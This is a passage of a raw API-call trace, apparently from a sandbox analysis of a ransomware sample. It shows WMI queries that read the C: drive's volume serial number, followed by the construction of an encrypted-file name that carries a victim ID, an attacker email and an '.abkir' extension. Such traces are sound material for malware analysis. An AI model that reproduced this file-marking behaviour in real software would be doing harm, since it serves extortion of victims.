puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.853] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0194.853] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0194.853] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0194.853] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0194.853] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0194.853] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0194.854] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0194.854] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.854] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0194.854] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0194.854] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0194.854] IUnknown:Release (This=0xb51e34) returned 0x1 [0194.855] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x60275d0) returned 0x0 [0194.855] WbemDefPath:IUnknown:QueryInterface (in: This=0x60275d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0194.855] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60275d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x60305c0) returned 0x0 [0194.855] WbemDefPath:IUnknown:Release (This=0x60275d0) returned 0x0 [0194.855] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x60305c0) returned 0x0 [0194.855] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0194.855] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0194.855] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0194.855] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0194.855] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0x66cca38) returned 0x0 [0194.855] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cca38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.855] WbemDefPath:IUnknown:Release (This=0x66cca38) returned 0x3 [0194.855] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0194.855] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0194.855] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0194.856] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0194.856] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0194.856] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0194.856] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0194.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x60305c0) returned 0x0 [0194.856] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0194.856] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0194.856] WbemDefPath:IWbemPath:SetText (This=0x60305c0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0194.856] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0194.856] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0194.856] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.856] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0194.856] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0194.856] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0194.856] IUnknown:Release (This=0xb51e34) returned 0x1 [0194.857] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6023cc0) returned 0x0 [0194.857] WbemLocator:IUnknown:QueryInterface (in: This=0x6023cc0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0194.857] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023cc0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x60275e0) returned 0x0 [0194.857] WbemLocator:IUnknown:Release (This=0x6023cc0) returned 0x0 [0194.857] WbemLocator:IUnknown:QueryInterface (in: This=0x60275e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x60275e0) returned 0x0 [0194.857] WbemLocator:IUnknown:QueryInterface (in: This=0x60275e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0194.857] WbemLocator:IUnknown:AddRef (This=0x60275e0) returned 0x3 [0194.857] WbemLocator:IUnknown:QueryInterface (in: This=0x60275e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0194.857] WbemLocator:IUnknown:QueryInterface (in: This=0x60275e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0194.857] WbemLocator:IUnknown:QueryInterface (in: This=0x60275e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0194.857] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0194.857] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0194.857] WbemLocator:IUnknown:QueryInterface (in: This=0x60275e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0194.857] WbemLocator:IUnknown:Release (This=0x60275e0) returned 0x2 [0194.857] WbemLocator:IUnknown:Release (This=0x60275e0) returned 0x1 [0194.857] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0194.858] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0194.858] WbemLocator:IUnknown:QueryInterface (in: This=0x60275e0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x60275e0) returned 0x0 [0194.858] WbemLocator:IUnknown:AddRef (This=0x60275e0) returned 0x3 [0194.858] WbemLocator:IUnknown:Release (This=0x60275e0) returned 0x2 [0194.858] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0194.858] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0194.858] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.858] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6027650) returned 0x0 [0194.858] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027650, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x60334d4) returned 0x0 [0195.431] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5a9b4) returned 0x0 [0195.432] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a9b4, pProxy=0x60334d4, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0195.432] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x1 [0195.432] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5a9d4) returned 0x0 [0195.432] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5a9b4) returned 0x0 [0195.432] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a9b4, pProxy=0x60334d4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0195.432] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x2 [0195.432] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0195.432] CoTaskMemFree (pv=0xbd4858) [0195.432] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x0 [0195.432] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5a9d4) returned 0x0 [0195.432] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0195.433] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0195.433] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0195.433] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0195.433] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0195.434] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5a934) returned 0x0 [0195.434] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a934, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.434] WbemLocator:IUnknown:Release (This=0xb5a934) returned 0x3 [0195.434] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0195.434] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0195.434] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5a9bc) returned 0x0 [0195.434] WbemLocator:IRpcOptions:Query (in: This=0xb5a9bc, pPrx=0xb5a9d4, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0195.434] WbemLocator:IUnknown:Release (This=0xb5a9bc) returned 0x3 [0195.434] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0195.434] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0195.434] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0195.434] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x60334d4) returned 0x0 [0195.434] WbemLocator:IUnknown:AddRef (This=0x60334d4) returned 0x4 [0195.434] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x3 [0195.434] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x2 [0195.434] SysStringLen (param_1=0x0) returned 0x0 [0195.435] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0195.435] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0195.435] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.435] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0195.435] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0195.435] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5a9d4) returned 0x0 [0195.435] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x3 [0195.435] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0195.435] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0195.435] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.435] IWbemServices:GetObject (in: This=0x60334d4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0195.468] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0195.468] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0195.468] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.468] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38dc95c*=0, plFlavor=0x38dc960*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x38dc95c*=8, plFlavor=0x38dc960*=0) returned 0x0 [0195.468] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.468] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.468] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38dc95c*=8, plFlavor=0x38dc960*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x38dc95c*=8, plFlavor=0x38dc960*=0) returned 0x0 [0195.468] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.468] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", lpFilePart=0x0) returned 0x42 [0195.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x65 [0195.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0195.468] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, 